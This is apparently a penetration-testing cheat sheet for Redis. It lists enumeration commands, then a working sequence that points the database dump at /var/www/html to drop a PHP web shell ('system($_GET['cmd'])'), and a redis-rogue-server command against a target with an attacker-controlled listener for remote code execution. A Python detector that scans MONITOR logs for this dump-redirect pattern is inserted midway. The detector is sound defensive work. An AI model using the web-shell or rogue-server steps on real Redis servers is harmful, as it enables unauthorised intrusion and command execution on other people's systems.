
Redis

Redis is an in-memory data structure store used as a database, cache, message broker, and streaming engine.

:: Redis
6379/TCP

Redis Security

Redis does not try to implement access control; it provides a tiny layer of optional authentication that is turned on by editing the redis.conf file. The password is set by the system administrator in clear text inside the redis.conf file.

:: Authenticating in Redis
AUTH <username> <password>

Enumeration

:: Show Database Information
INFO

:: Show Database Configuration
CONFIG GET *

:: Show Connected Clients
client list

PHP Web-Shell

Only possible if we know the path of the website folder.
:: Apache PATH
config set dir /var/www/html

:: Filename
config set dbfilename web_shell.php

:: PAYLOAD
set test "<?php system($_GET['cmd']);?>"
save
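
:: Detection (added example, not part of the original notes)
The sequence above leaves a clear trace: one client changes dir or dbfilename with CONFIG SET and then forces a dump with SAVE. The Python sketch below scans captured MONITOR output for that pattern; the sample log lines, client addresses and the function name find_dump_redirects are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of MONITOR output (timestamps and addresses are made up).
SAMPLE = r'''
1700000000.100001 [0 10.0.0.5:40112] "get" "session:42"
1700000001.200002 [0 10.0.0.9:51844] "config" "set" "dir" "/var/www/html"
1700000001.300003 [0 10.0.0.9:51844] "config" "set" "dbfilename" "web_shell.php"
1700000001.400004 [0 10.0.0.9:51844] "set" "test" "<?php system($_GET['cmd']);?>"
1700000001.500005 [0 10.0.0.9:51844] "save"
1700000002.600006 [0 10.0.0.5:40112] "bgsave"
'''

LINE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')  # time, db, client, args
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')                    # one quoted argument

def find_dump_redirects(monitor_text):
    """Return one finding per SAVE/BGSAVE issued by a client that first
    changed dir or dbfilename with CONFIG SET."""
    pending = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    findings = []
    for raw in monitor_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, _db, client, rest = m.groups()
        args = ARG.findall(rest)
        cmd = [a.lower() for a in args[:2]]
        if cmd == ["config", "set"]:
            # CONFIG SET may carry several name/value pairs in one call.
            for key, value in zip(args[2::2], args[3::2]):
                if key.lower() in ("dir", "dbfilename"):
                    pending[client][key.lower()] = value
        elif cmd[:1] in (["save"], ["bgsave"]) and pending.get(client):
            changed = pending.pop(client)
            name = changed.get("dbfilename", "")
            findings.append({
                "time": float(ts), "client": client, "changed": changed,
                # A dump file that is not *.rdb is the strongest signal.
                "severity": "high" if name and not name.lower().endswith(".rdb") else "medium",
            })
    return findings

if __name__ == "__main__":
    for finding in find_dump_redirects(SAMPLE):
        print(finding)
```

MONITOR streams every command and costs throughput, so run this over short captures rather than leaving it attached permanently.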

Redis Rogue Server

Redis RCE

Works only on versions <= 5.0.5

redis-rogue-server --rhost <TARGET_IP> --lhost <ATTACKER_IP>